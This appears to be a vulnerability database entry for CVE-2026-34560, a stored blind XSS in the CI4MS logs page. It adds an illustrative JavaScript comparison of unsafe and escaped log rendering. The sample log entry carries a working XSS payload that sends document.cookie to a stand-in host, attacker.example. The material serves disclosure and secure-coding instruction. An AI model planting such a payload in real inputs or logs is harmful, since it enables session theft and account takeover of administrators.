CVE-2026-34560
CRITICAL
CI4MS: Logs Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS
Title source: cnaDescription
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application renders user-controlled input unsafely within the logs interface. If any stored XSS payload exists within logged data, it is rendered without proper output encoding. This issue becomes a Blind XSS scenario because the attacker does not see immediate execution. Instead, the payload is stored within application logs and only executes later when an administrator views the logs page. This issue has been patched in version 0.31.0.0.
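The rendering flaw the description names, shown as an added example that is not CI4MS code: a log entry whose attacker-controlled field (here a User-Agent header on an unauthenticated request, a constructed sample) is interpolated into the administrator's log table without output encoding, beside the encoded version. The entry shape, the two render functions, escapeHtml and containsActiveMarkup are assumptions made for illustration; nothing below is taken from the project or its advisory.

```javascript
// Added example (not CI4MS code). Demonstrates a blind/stored XSS in a
// log viewer: the payload is written into a log by a request nobody
// reviews, and executes only when an administrator opens the log page.

// Constructed log entry: the server logged the raw User-Agent header.
const sampleEntry = {
  time: "2026-04-01T12:00:00Z",
  level: "ERROR",
  message: "Unhandled exception",
  userAgent:
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
};

// Vulnerable pattern (assumed): logged fields are interpolated straight
// into markup that the viewer later assigns to innerHTML, so the browser
// parses the payload as HTML and runs onerror in the admin's session.
function renderLogRowUnsafe(e) {
  return (
    `<tr><td>${e.time}</td><td>${e.level}</td>` +
    `<td>${e.message}</td><td>${e.userAgent}</td></tr>`
  );
}

// Hardened pattern: encode every logged field for an HTML text context
// before it reaches the DOM. Five characters cover the text and
// attribute-value contexts used here.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  })[c]);
}

function renderLogRowSafe(e) {
  const cells = [e.time, e.level, e.message, e.userAgent].map(escapeHtml);
  return `<tr>${cells.map((c) => `<td>${c}</td>`).join("")}</tr>`;
}

// Cheap check used for the comparison below: does the rendered markup
// contain a tag carrying an on* event-handler attribute, i.e. something
// the administrator's browser would execute?
function containsActiveMarkup(html) {
  return /<\w+[^>]*\son\w+\s*=/i.test(html);
}

const unsafeRow = renderLogRowUnsafe(sampleEntry);
const safeRow = renderLogRowSafe(sampleEntry);
console.log("unsafe row carries an event handler:", containsActiveMarkup(unsafeRow)); // true
console.log("safe row carries an event handler:", containsActiveMarkup(safeRow)); // false
```

In browser code the equivalent fix is to populate cells with textContent or createElement instead of assigning innerHTML; in a CodeIgniter 4 view the same encoding is the framework's esc() helper. Because the attacker never sees the log page, the only evidence of success is the callback to their listener, which is why this class is tested with out-of-band payloads rather than by watching the response.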
References (2)
Advisory (x_refsource_confirm)
https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-r4v5-rwr2-q7r4
Release (x_refsource_misc)
https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0
Scores
CVSS v3.1 base score
9.1 (CRITICAL)
CVSS v3.1 vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
EPSS
0.0038 (0.38% probability of exploitation activity in the next 30 days)
EPSS Percentile
29.7%
Attack Vector
NETWORK
CISA SSVC (Vulnrichment)
Exploitation
poc
Automatable
no
Technical Impact
partial
Details
CWE
CWE-79 (Improper Neutralization of Input During Web Page Generation, "Cross-site Scripting")
Status
published
Products (2)
ci4-cms-erp/ci4ms
< 0.31.0.0 (2 CPE variants)
ci4-cms-erp/ci4ms (Packagist)
0 - 0.31.0.0
Published
Apr 01, 2026
Tracked Since
Apr 02, 2026